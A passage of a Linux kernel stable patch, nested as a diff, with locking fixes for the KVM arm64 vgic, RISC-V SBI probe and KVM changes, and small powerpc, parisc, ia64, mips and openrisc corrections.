+ }
+diff --git a/arch/arm64/kvm/vgic/vgic-kvm-device.c b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+index edeac2380591f..07e727023deb7 100644
+--- a/arch/arm64/kvm/vgic/vgic-kvm-device.c
++++ b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+@@ -46,7 +46,7 @@ int kvm_set_legacy_vgic_v2_addr(struct kvm *kvm, struct kvm_arm_device_addr *dev
+ 	struct vgic_dist *vgic = &kvm->arch.vgic;
+ 	int r;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	switch (FIELD_GET(KVM_ARM_DEVICE_TYPE_MASK, dev_addr->id)) {
+ 	case KVM_VGIC_V2_ADDR_TYPE_DIST:
+ 		r = vgic_check_type(kvm, KVM_DEV_TYPE_ARM_VGIC_V2);
+@@ -68,7 +68,7 @@ int kvm_set_legacy_vgic_v2_addr(struct kvm *kvm, struct kvm_arm_device_addr *dev
+ 		r = -ENODEV;
+ 	}
+ 
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	return r;
+ }
+@@ -102,7 +102,7 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 		if (get_user(addr, uaddr))
+ 			return -EFAULT;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	switch (attr->attr) {
+ 	case KVM_VGIC_V2_ADDR_TYPE_DIST:
+ 		r = vgic_check_type(kvm, KVM_DEV_TYPE_ARM_VGIC_V2);
+@@ -191,7 +191,7 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 	}
+ 
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	if (!r && !write)
+ 		r =  put_user(addr, uaddr);
+@@ -227,7 +227,7 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 		    (val & 31))
+ 			return -EINVAL;
+ 
+-		mutex_lock(&dev->kvm->lock);
++		mutex_lock(&dev->kvm->arch.config_lock);
+ 
+ 		if (vgic_ready(dev->kvm) || dev->kvm->arch.vgic.nr_spis)
+ 			ret = -EBUSY;
+@@ -235,16 +235,16 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 			dev->kvm->arch.vgic.nr_spis =
+ 				val - VGIC_NR_PRIVATE_IRQS;
+ 
+-		mutex_unlock(&dev->kvm->lock);
++		mutex_unlock(&dev->kvm->arch.config_lock);
+ 
+ 		return ret;
+ 	}
+ 	case KVM_DEV_ARM_VGIC_GRP_CTRL: {
+ 		switch (attr->attr) {
+ 		case KVM_DEV_ARM_VGIC_CTRL_INIT:
+-			mutex_lock(&dev->kvm->lock);
++			mutex_lock(&dev->kvm->arch.config_lock);
+ 			r = vgic_init(dev->kvm);
+-			mutex_unlock(&dev->kvm->lock);
++			mutex_unlock(&dev->kvm->arch.config_lock);
+ 			return r;
+ 		case KVM_DEV_ARM_VGIC_SAVE_PENDING_TABLES:
+ 			/*
+@@ -260,7 +260,10 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 				mutex_unlock(&dev->kvm->lock);
+ 				return -EBUSY;
+ 			}
++
++			mutex_lock(&dev->kvm->arch.config_lock);
+ 			r = vgic_v3_save_pending_tables(dev->kvm);
++			mutex_unlock(&dev->kvm->arch.config_lock);
+ 			unlock_all_vcpus(dev->kvm);
+ 			mutex_unlock(&dev->kvm->lock);
+ 			return r;
+@@ -411,15 +414,17 @@ static int vgic_v2_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
++	}
++
++	mutex_lock(&dev->kvm->arch.config_lock);
++
+ 	ret = vgic_init(dev->kvm);
+ 	if (ret)
+ 		goto out;
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
+-		ret = -EBUSY;
+-		goto out;
+-	}
+-
+ 	switch (attr->group) {
+ 	case KVM_DEV_ARM_VGIC_GRP_CPU_REGS:
+ 		ret = vgic_v2_cpuif_uaccess(vcpu, is_write, addr, &val);
+@@ -432,8 +437,9 @@ static int vgic_v2_attr_regs_access(struct kvm_device *dev,
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 
+ 	if (!ret && !is_write)
+@@ -569,12 +575,14 @@ static int vgic_v3_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
+-	if (unlikely(!vgic_initialized(dev->kvm))) {
+-		ret = -EBUSY;
+-		goto out;
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
+ 	}
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
++	mutex_lock(&dev->kvm->arch.config_lock);
++
++	if (unlikely(!vgic_initialized(dev->kvm))) {
+ 		ret = -EBUSY;
+ 		goto out;
+ 	}
+@@ -609,8 +617,9 @@ static int vgic_v3_attr_regs_access(struct kvm_device *dev,
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 
+ 	if (!ret && uaccess && !is_write) {
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index 91201f7430339..472b18ac92a24 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -111,7 +111,7 @@ static void vgic_mmio_write_v3_misc(struct kvm_vcpu *vcpu,
+ 	case GICD_CTLR: {
+ 		bool was_enabled, is_hwsgi;
+ 
+-		mutex_lock(&vcpu->kvm->lock);
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 
+ 		was_enabled = dist->enabled;
+ 		is_hwsgi = dist->nassgireq;
+@@ -139,7 +139,7 @@ static void vgic_mmio_write_v3_misc(struct kvm_vcpu *vcpu,
+ 		else if (!was_enabled && dist->enabled)
+ 			vgic_kick_vcpus(vcpu->kvm);
+ 
+-		mutex_unlock(&vcpu->kvm->lock);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 		break;
+ 	}
+ 	case GICD_TYPER:
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio.c b/arch/arm64/kvm/vgic/vgic-mmio.c
+index b32d434c1d4a4..a95f99b93dd68 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio.c
+@@ -527,13 +527,13 @@ unsigned long vgic_mmio_read_active(struct kvm_vcpu *vcpu,
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 	u32 val;
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	val = __vgic_mmio_read_active(vcpu, addr, len);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 
+ 	return val;
+ }
+@@ -622,13 +622,13 @@ void vgic_mmio_write_cactive(struct kvm_vcpu *vcpu,
+ {
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	__vgic_mmio_write_cactive(vcpu, addr, len, val);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ }
+ 
+ int vgic_mmio_uaccess_write_cactive(struct kvm_vcpu *vcpu,
+@@ -659,13 +659,13 @@ void vgic_mmio_write_sactive(struct kvm_vcpu *vcpu,
+ {
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	__vgic_mmio_write_sactive(vcpu, addr, len, val);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ }
+ 
+ int vgic_mmio_uaccess_write_sactive(struct kvm_vcpu *vcpu,
+diff --git a/arch/arm64/kvm/vgic/vgic-v4.c b/arch/arm64/kvm/vgic/vgic-v4.c
+index a413718be92b8..3bb0034780605 100644
+--- a/arch/arm64/kvm/vgic/vgic-v4.c
++++ b/arch/arm64/kvm/vgic/vgic-v4.c
+@@ -232,9 +232,8 @@ int vgic_v4_request_vpe_irq(struct kvm_vcpu *vcpu, int irq)
+  * @kvm:	Pointer to the VM being initialized
+  *
+  * We may be called each time a vITS is created, or when the
+- * vgic is initialized. This relies on kvm->lock to be
+- * held. In both cases, the number of vcpus should now be
+- * fixed.
++ * vgic is initialized. In both cases, the number of vcpus
++ * should now be fixed.
+  */
+ int vgic_v4_init(struct kvm *kvm)
+ {
+@@ -243,6 +242,8 @@ int vgic_v4_init(struct kvm *kvm)
+ 	int nr_vcpus, ret;
+ 	unsigned long i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!kvm_vgic_global_state.has_gicv4)
+ 		return 0; /* Nothing to see here... move along. */
+ 
+@@ -309,14 +310,14 @@ int vgic_v4_init(struct kvm *kvm)
+ /**
+  * vgic_v4_teardown - Free the GICv4 data structures
+  * @kvm:	Pointer to the VM being destroyed
+- *
+- * Relies on kvm->lock to be held.
+  */
+ void vgic_v4_teardown(struct kvm *kvm)
+ {
+ 	struct its_vm *its_vm = &kvm->arch.vgic.its_vm;
+ 	int i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!its_vm->vpes)
+ 		return;
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic.c b/arch/arm64/kvm/vgic/vgic.c
+index d97e6080b4217..0a005da83ae64 100644
+--- a/arch/arm64/kvm/vgic/vgic.c
++++ b/arch/arm64/kvm/vgic/vgic.c
+@@ -24,11 +24,13 @@ struct vgic_global kvm_vgic_global_state __ro_after_init = {
+ /*
+  * Locking order is always:
+  * kvm->lock (mutex)
+- *   its->cmd_lock (mutex)
+- *     its->its_lock (mutex)
+- *       vgic_cpu->ap_list_lock		must be taken with IRQs disabled
+- *         kvm->lpi_list_lock		must be taken with IRQs disabled
+- *           vgic_irq->irq_lock		must be taken with IRQs disabled
++ *   vcpu->mutex (mutex)
++ *     kvm->arch.config_lock (mutex)
++ *       its->cmd_lock (mutex)
++ *         its->its_lock (mutex)
++ *           vgic_cpu->ap_list_lock		must be taken with IRQs disabled
++ *             kvm->lpi_list_lock		must be taken with IRQs disabled
++ *               vgic_irq->irq_lock		must be taken with IRQs disabled
+  *
+  * As the ap_list_lock might be taken from the timer interrupt handler,
+  * we have to disable IRQs before taking this lock and everything lower
+diff --git a/arch/ia64/kernel/salinfo.c b/arch/ia64/kernel/salinfo.c
+index bd3ba276e69c3..03b632c568995 100644
+--- a/arch/ia64/kernel/salinfo.c
++++ b/arch/ia64/kernel/salinfo.c
+@@ -581,7 +581,7 @@ static int salinfo_cpu_pre_down(unsigned int cpu)
+  * 'data' contains an integer that corresponds to the feature we're
+  * testing
+  */
+-static int proc_salinfo_show(struct seq_file *m, void *v)
++static int __maybe_unused proc_salinfo_show(struct seq_file *m, void *v)
+ {
+ 	unsigned long data = (unsigned long)v;
+ 	seq_puts(m, (sal_platform_features & data) ? "1\n" : "0\n");
+diff --git a/arch/ia64/mm/contig.c b/arch/ia64/mm/contig.c
+index 24901d8093015..1e9eaa107eb73 100644
+--- a/arch/ia64/mm/contig.c
++++ b/arch/ia64/mm/contig.c
+@@ -77,7 +77,7 @@ skip:
+ 	return __per_cpu_start + __per_cpu_offset[smp_processor_id()];
+ }
+ 
+-static inline void
++static inline __init void
+ alloc_per_cpu_data(void)
+ {
+ 	size_t size = PERCPU_PAGE_SIZE * num_possible_cpus();
+diff --git a/arch/ia64/mm/hugetlbpage.c b/arch/ia64/mm/hugetlbpage.c
+index 380d2f3966c98..9e8960e499622 100644
+--- a/arch/ia64/mm/hugetlbpage.c
++++ b/arch/ia64/mm/hugetlbpage.c
+@@ -58,7 +58,7 @@ huge_pte_offset (struct mm_struct *mm, unsigned long addr, unsigned long sz)
+ 
+ 	pgd = pgd_offset(mm, taddr);
+ 	if (pgd_present(*pgd)) {
+-		p4d = p4d_offset(pgd, addr);
++		p4d = p4d_offset(pgd, taddr);
+ 		if (p4d_present(*p4d)) {
+ 			pud = pud_offset(p4d, taddr);
+ 			if (pud_present(*pud)) {
+diff --git a/arch/mips/fw/lib/cmdline.c b/arch/mips/fw/lib/cmdline.c
+index f24cbb4a39b50..892765b742bbc 100644
+--- a/arch/mips/fw/lib/cmdline.c
++++ b/arch/mips/fw/lib/cmdline.c
+@@ -53,7 +53,7 @@ char *fw_getenv(char *envname)
+ {
+ 	char *result = NULL;
+ 
+-	if (_fw_envp != NULL) {
++	if (_fw_envp != NULL && fw_envp(0) != NULL) {
+ 		/*
+ 		 * Return a pointer to the given environment variable.
+ 		 * YAMON uses "name", "value" pairs, while U-Boot uses
+diff --git a/arch/openrisc/kernel/entry.S b/arch/openrisc/kernel/entry.S
+index 54a87bba35caa..a130c4dac48d3 100644
+--- a/arch/openrisc/kernel/entry.S
++++ b/arch/openrisc/kernel/entry.S
+@@ -173,7 +173,6 @@ handler:							;\
+ 	l.sw    PT_GPR28(r1),r28					;\
+ 	l.sw    PT_GPR29(r1),r29					;\
+ 	/* r30 already save */					;\
+-/*        l.sw    PT_GPR30(r1),r30*/					;\
+ 	l.sw    PT_GPR31(r1),r31					;\
+ 	TRACE_IRQS_OFF_ENTRY						;\
+ 	/* Store -1 in orig_gpr11 for non-syscall exceptions */	;\
+@@ -211,9 +210,8 @@ handler:							;\
+ 	l.sw    PT_GPR27(r1),r27					;\
+ 	l.sw    PT_GPR28(r1),r28					;\
+ 	l.sw    PT_GPR29(r1),r29					;\
+-	/* r31 already saved */					;\
+-	l.sw    PT_GPR30(r1),r30					;\
+-/*        l.sw    PT_GPR31(r1),r31	*/				;\
++	/* r30 already saved */						;\
++	l.sw    PT_GPR31(r1),r31					;\
+ 	/* Store -1 in orig_gpr11 for non-syscall exceptions */	;\
+ 	l.addi	r30,r0,-1					;\
+ 	l.sw	PT_ORIG_GPR11(r1),r30				;\
+diff --git a/arch/parisc/kernel/pacache.S b/arch/parisc/kernel/pacache.S
+index 9a0018f1f42cb..541370d145594 100644
+--- a/arch/parisc/kernel/pacache.S
++++ b/arch/parisc/kernel/pacache.S
+@@ -889,6 +889,7 @@ ENDPROC_CFI(flush_icache_page_asm)
+ ENTRY_CFI(flush_kernel_dcache_page_asm)
+ 88:	ldil		L%dcache_stride, %r1
+ 	ldw		R%dcache_stride(%r1), %r23
++	depi_safe	0, 31,PAGE_SHIFT, %r26	/* Clear any offset bits */
+ 
+ #ifdef CONFIG_64BIT
+ 	depdi,z		1, 63-PAGE_SHIFT,1, %r25
+@@ -925,6 +926,7 @@ ENDPROC_CFI(flush_kernel_dcache_page_asm)
+ ENTRY_CFI(purge_kernel_dcache_page_asm)
+ 88:	ldil		L%dcache_stride, %r1
+ 	ldw		R%dcache_stride(%r1), %r23
++	depi_safe	0, 31,PAGE_SHIFT, %r26	/* Clear any offset bits */
+ 
+ #ifdef CONFIG_64BIT
+ 	depdi,z		1, 63-PAGE_SHIFT,1, %r25
+diff --git a/arch/parisc/kernel/real2.S b/arch/parisc/kernel/real2.S
+index 4dc12c4c09809..509d18b8e0e65 100644
+--- a/arch/parisc/kernel/real2.S
++++ b/arch/parisc/kernel/real2.S
+@@ -235,9 +235,6 @@ ENTRY_CFI(real64_call_asm)
+ 	/* save fn */
+ 	copy	%arg2, %r31
+ 
+-	/* set up the new ap */
+-	ldo	64(%arg1), %r29
+-
+ 	/* load up the arg registers from the saved arg area */
+ 	/* 32-bit calling convention passes first 4 args in registers */
+ 	ldd	0*REG_SZ(%arg1), %arg0		/* note overwriting arg0 */
+@@ -249,7 +246,9 @@ ENTRY_CFI(real64_call_asm)
+ 	ldd	7*REG_SZ(%arg1), %r19
+ 	ldd	1*REG_SZ(%arg1), %arg1		/* do this one last! */
+ 
++	/* set up real-mode stack and real-mode ap */
+ 	tophys_r1 %sp
++	ldo	-16(%sp), %r29			/* Reference param save area */
+ 
+ 	b,l	rfi_virt2real,%r2
+ 	nop
+diff --git a/arch/powerpc/boot/Makefile b/arch/powerpc/boot/Makefile
+index 295f76df13b55..13fad4f0a6d8f 100644
+--- a/arch/powerpc/boot/Makefile
++++ b/arch/powerpc/boot/Makefile
+@@ -34,6 +34,8 @@ endif
+ 
+ BOOTCFLAGS    := -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+ 		 -fno-strict-aliasing -O2 -msoft-float -mno-altivec -mno-vsx \
++		 $(call cc-option,-mno-prefixed) $(call cc-option,-mno-pcrel) \
++		 $(call cc-option,-mno-mma) \
+ 		 $(call cc-option,-mno-spe) $(call cc-option,-mspe=no) \
+ 		 -pipe -fomit-frame-pointer -fno-builtin -fPIC -nostdinc \
+ 		 $(LINUXINCLUDE)
+diff --git a/arch/powerpc/include/asm/reg.h b/arch/powerpc/include/asm/reg.h
+index 1e8b2e04e626a..8fda87af2fa5e 100644
+--- a/arch/powerpc/include/asm/reg.h
++++ b/arch/powerpc/include/asm/reg.h
+@@ -1310,6 +1310,11 @@
+ #define PVR_VER_E500MC	0x8023
+ #define PVR_VER_E5500	0x8024
+ #define PVR_VER_E6500	0x8040
++#define PVR_VER_7450	0x8000
++#define PVR_VER_7455	0x8001
++#define PVR_VER_7447	0x8002
++#define PVR_VER_7447A	0x8003
++#define PVR_VER_7448	0x8004
+ 
+ /*
+  * For the 8xx processors, all of them report the same PVR family for
+diff --git a/arch/powerpc/kernel/rtas.c b/arch/powerpc/kernel/rtas.c
+index deded51a79784..333a239a30d62 100644
+--- a/arch/powerpc/kernel/rtas.c
++++ b/arch/powerpc/kernel/rtas.c
+@@ -425,7 +425,7 @@ static char *__fetch_rtas_last_error(char *altbuf)
+ 				buf = kmalloc(RTAS_ERROR_LOG_MAX, GFP_ATOMIC);
+ 		}
+ 		if (buf)
+-			memcpy(buf, rtas_err_buf, RTAS_ERROR_LOG_MAX);
++			memmove(buf, rtas_err_buf, RTAS_ERROR_LOG_MAX);
+ 	}
+ 
+ 	return buf;
+diff --git a/arch/powerpc/perf/mpc7450-pmu.c b/arch/powerpc/perf/mpc7450-pmu.c
+index 552d51a925d37..db451b9aac35e 100644
+--- a/arch/powerpc/perf/mpc7450-pmu.c
++++ b/arch/powerpc/perf/mpc7450-pmu.c
+@@ -417,9 +417,9 @@ struct power_pmu mpc7450_pmu = {
+ 
+ static int __init init_mpc7450_pmu(void)
+ {
+-	unsigned int pvr = mfspr(SPRN_PVR);
+-
+-	if (PVR_VER(pvr) != PVR_7450)
++	if (!pvr_version_is(PVR_VER_7450) && !pvr_version_is(PVR_VER_7455) &&
++	    !pvr_version_is(PVR_VER_7447) && !pvr_version_is(PVR_VER_7447A) &&
++	    !pvr_version_is(PVR_VER_7448))
+ 		return -ENODEV;
+ 
+ 	return register_power_pmu(&mpc7450_pmu);
+diff --git a/arch/powerpc/platforms/512x/clock-commonclk.c b/arch/powerpc/platforms/512x/clock-commonclk.c
+index 42abeba4f6983..079cb3627eacd 100644
+--- a/arch/powerpc/platforms/512x/clock-commonclk.c
++++ b/arch/powerpc/platforms/512x/clock-commonclk.c
+@@ -986,7 +986,7 @@ static void __init mpc5121_clk_provide_migration_support(void)
+ 
+ #define NODE_PREP do { \
+ 	of_address_to_resource(np, 0, &res); \
+-	snprintf(devname, sizeof(devname), "%08x.%s", res.start, np->name); \
++	snprintf(devname, sizeof(devname), "%pa.%s", &res.start, np->name); \
+ } while (0)
+ 
+ #define NODE_CHK(clkname, clkitem, regnode, regflag) do { \
+diff --git a/arch/powerpc/platforms/embedded6xx/flipper-pic.c b/arch/powerpc/platforms/embedded6xx/flipper-pic.c
+index 609bda2ad5dd2..4d9200bdba78c 100644
+--- a/arch/powerpc/platforms/embedded6xx/flipper-pic.c
++++ b/arch/powerpc/platforms/embedded6xx/flipper-pic.c
+@@ -145,7 +145,7 @@ static struct irq_domain * __init flipper_pic_init(struct device_node *np)
+ 	}
+ 	io_base = ioremap(res.start, resource_size(&res));
+ 
+-	pr_info("controller at 0x%08x mapped to 0x%p\n", res.start, io_base);
++	pr_info("controller at 0x%pa mapped to 0x%p\n", &res.start, io_base);
+ 
+ 	__flipper_quiesce(io_base);
+ 
+diff --git a/arch/powerpc/platforms/embedded6xx/hlwd-pic.c b/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
+index 380b4285cce47..4d2d92de30afd 100644
+--- a/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
++++ b/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
+@@ -171,7 +171,7 @@ static struct irq_domain *__init hlwd_pic_init(struct device_node *np)
+ 		return NULL;
+ 	}
+ 
+-	pr_info("controller at 0x%08x mapped to 0x%p\n", res.start, io_base);
++	pr_info("controller at 0x%pa mapped to 0x%p\n", &res.start, io_base);
+ 
+ 	__hlwd_quiesce(io_base);
+ 
+diff --git a/arch/powerpc/platforms/embedded6xx/wii.c b/arch/powerpc/platforms/embedded6xx/wii.c
+index f4e654a9d4ff6..219659f2ede06 100644
+--- a/arch/powerpc/platforms/embedded6xx/wii.c
++++ b/arch/powerpc/platforms/embedded6xx/wii.c
+@@ -74,8 +74,8 @@ static void __iomem *__init wii_ioremap_hw_regs(char *name, char *compatible)
+ 
+ 	hw_regs = ioremap(res.start, resource_size(&res));
+ 	if (hw_regs) {
+-		pr_info("%s at 0x%08x mapped to 0x%p\n", name,
+-			res.start, hw_regs);
++		pr_info("%s at 0x%pa mapped to 0x%p\n", name,
++			&res.start, hw_regs);
+ 	}
+ 
+ out_put:
+diff --git a/arch/powerpc/sysdev/tsi108_pci.c b/arch/powerpc/sysdev/tsi108_pci.c
+index 5af4c35ff5842..0e42f7bad7db1 100644
+--- a/arch/powerpc/sysdev/tsi108_pci.c
++++ b/arch/powerpc/sysdev/tsi108_pci.c
+@@ -217,9 +217,8 @@ int __init tsi108_setup_pci(struct device_node *dev, u32 cfg_phys, int primary)
+ 
+ 	(hose)->ops = &tsi108_direct_pci_ops;
+ 
+-	printk(KERN_INFO "Found tsi108 PCI host bridge at 0x%08x. "
+-	       "Firmware bus number: %d->%d\n",
+-	       rsrc.start, hose->first_busno, hose->last_busno);
++	pr_info("Found tsi108 PCI host bridge at 0x%pa. Firmware bus number: %d->%d\n",
++		&rsrc.start, hose->first_busno, hose->last_busno);
+ 
+ 	/* Interpret the "ranges" property */
+ 	/* This also maps the I/O region and sets isa_io/mem_base */
+diff --git a/arch/riscv/include/asm/sbi.h b/arch/riscv/include/asm/sbi.h
+index 4ca7fbacff424..8cb7c579aa21d 100644
+--- a/arch/riscv/include/asm/sbi.h
++++ b/arch/riscv/include/asm/sbi.h
+@@ -293,7 +293,7 @@ int sbi_remote_hfence_vvma_asid(const struct cpumask *cpu_mask,
+ 				unsigned long start,
+ 				unsigned long size,
+ 				unsigned long asid);
+-int sbi_probe_extension(int ext);
++long sbi_probe_extension(int ext);
+ 
+ /* Check if current SBI specification version is 0.1 or not */
+ static inline int sbi_spec_is_0_1(void)
+diff --git a/arch/riscv/kernel/cpu_ops.c b/arch/riscv/kernel/cpu_ops.c
+index 8275f237a59df..eb479a88a954e 100644
+--- a/arch/riscv/kernel/cpu_ops.c
++++ b/arch/riscv/kernel/cpu_ops.c
+@@ -27,7 +27,7 @@ const struct cpu_operations cpu_ops_spinwait = {
+ void __init cpu_set_ops(int cpuid)
+ {
+ #if IS_ENABLED(CONFIG_RISCV_SBI)
+-	if (sbi_probe_extension(SBI_EXT_HSM) > 0) {
++	if (sbi_probe_extension(SBI_EXT_HSM)) {
+ 		if (!cpuid)
+ 			pr_info("SBI HSM extension detected\n");
+ 		cpu_ops[cpuid] = &cpu_ops_sbi;
+diff --git a/arch/riscv/kernel/sbi.c b/arch/riscv/kernel/sbi.c
+index 5c87db8fdff2d..015ce8eef2de2 100644
+--- a/arch/riscv/kernel/sbi.c
++++ b/arch/riscv/kernel/sbi.c
+@@ -581,19 +581,18 @@ static void sbi_srst_power_off(void)
+  * sbi_probe_extension() - Check if an SBI extension ID is supported or not.
+  * @extid: The extension ID to be probed.
+  *
+- * Return: Extension specific nonzero value f yes, -ENOTSUPP otherwise.
++ * Return: 1 or an extension specific nonzero value if yes, 0 otherwise.
+  */
+-int sbi_probe_extension(int extid)
++long sbi_probe_extension(int extid)
+ {
+ 	struct sbiret ret;
+ 
+ 	ret = sbi_ecall(SBI_EXT_BASE, SBI_EXT_BASE_PROBE_EXT, extid,
+ 			0, 0, 0, 0, 0);
+ 	if (!ret.error)
+-		if (ret.value)
+-			return ret.value;
++		return ret.value;
+ 
+-	return -ENOTSUPP;
++	return 0;
+ }
+ EXPORT_SYMBOL(sbi_probe_extension);
+ 
+@@ -665,26 +664,26 @@ void __init sbi_init(void)
+ 	if (!sbi_spec_is_0_1()) {
+ 		pr_info("SBI implementation ID=0x%lx Version=0x%lx\n",
+ 			sbi_get_firmware_id(), sbi_get_firmware_version());
+-		if (sbi_probe_extension(SBI_EXT_TIME) > 0) {
++		if (sbi_probe_extension(SBI_EXT_TIME)) {
+ 			__sbi_set_timer = __sbi_set_timer_v02;
+ 			pr_info("SBI TIME extension detected\n");
+ 		} else {
+ 			__sbi_set_timer = __sbi_set_timer_v01;
+ 		}
+-		if (sbi_probe_extension(SBI_EXT_IPI) > 0) {
++		if (sbi_probe_extension(SBI_EXT_IPI)) {
+ 			__sbi_send_ipi	= __sbi_send_ipi_v02;
+ 			pr_info("SBI IPI extension detected\n");
+ 		} else {
+ 			__sbi_send_ipi	= __sbi_send_ipi_v01;
+ 		}
+-		if (sbi_probe_extension(SBI_EXT_RFENCE) > 0) {
++		if (sbi_probe_extension(SBI_EXT_RFENCE)) {
+ 			__sbi_rfence	= __sbi_rfence_v02;
+ 			pr_info("SBI RFENCE extension detected\n");
+ 		} else {
+ 			__sbi_rfence	= __sbi_rfence_v01;
+ 		}
+ 		if ((sbi_spec_version >= sbi_mk_version(0, 3)) &&
+-		    (sbi_probe_extension(SBI_EXT_SRST) > 0)) {
++		    sbi_probe_extension(SBI_EXT_SRST)) {
+ 			pr_info("SBI SRST extension detected\n");
+ 			pm_power_off = sbi_srst_power_off;
+ 			sbi_srst_reboot_nb.notifier_call = sbi_srst_reboot;
+diff --git a/arch/riscv/kvm/main.c b/arch/riscv/kvm/main.c
+index 58c5489d3031a..2e9b1e89c6972 100644
+--- a/arch/riscv/kvm/main.c
++++ b/arch/riscv/kvm/main.c
+@@ -84,7 +84,7 @@ int kvm_arch_init(void *opaque)
+ 		return -ENODEV;
+ 	}
+ 
+-	if (sbi_probe_extension(SBI_EXT_RFENCE) <= 0) {
++	if (!sbi_probe_extension(SBI_EXT_RFENCE)) {
+ 		kvm_info("require SBI RFENCE extension\n");
+ 		return -ENODEV;
+ 	}
+diff --git a/arch/riscv/kvm/mmu.c b/arch/riscv/kvm/mmu.c
+index 34b57e0be2ef0..d1ae0df7411ea 100644
+--- a/arch/riscv/kvm/mmu.c
++++ b/arch/riscv/kvm/mmu.c
+@@ -628,6 +628,13 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 			!(memslot->flags & KVM_MEM_READONLY)) ? true : false;
+ 	unsigned long vma_pagesize, mmu_seq;
+ 
++	/* We need minimum second+third level pages */
++	ret = kvm_mmu_topup_memory_cache(pcache, gstage_pgd_levels);
++	if (ret) {
++		kvm_err("Failed to topup G-stage cache\n");
++		return ret;
++	}
++
+ 	mmap_read_lock(current->mm);
+ 
+ 	vma = vma_lookup(current->mm, hva);
+@@ -648,6 +655,15 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 	if (vma_pagesize == PMD_SIZE || vma_pagesize == PGDIR_SIZE)
+ 		gfn = (gpa & huge_page_mask(hstate_vma(vma))) >> PAGE_SHIFT;
+ 
++	/*
++	 * Read mmu_invalidate_seq so that KVM can detect if the results of
++	 * vma_lookup() or gfn_to_pfn_prot() become stale priort to acquiring
++	 * kvm->mmu_lock.
++	 *
++	 * Rely on mmap_read_unlock() for an implicit smp_rmb(), which pairs
++	 * with the smp_wmb() in kvm_mmu_invalidate_end().
++	 */
++	mmu_seq = kvm->mmu_invalidate_seq;
+ 	mmap_read_unlock(current->mm);
+ 
+ 	if (vma_pagesize != PGDIR_SIZE &&
+@@ -657,15 +673,6 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 		return -EFAULT;
+ 	}
+ 
+-	/* We need minimum second+third level pages */
+-	ret = kvm_mmu_topup_memory_cache(pcache, gstage_pgd_levels);
+-	if (ret) {
+-		kvm_err("Failed to topup G-stage cache\n");
+-		return ret;
+-	}
+-
+-	mmu_seq = kvm->mmu_invalidate_seq;
+-
+ 	hfn = gfn_to_pfn_prot(kvm, gfn, is_write, &writable);
+ 	if (hfn == KVM_PFN_ERR_HWPOISON) {
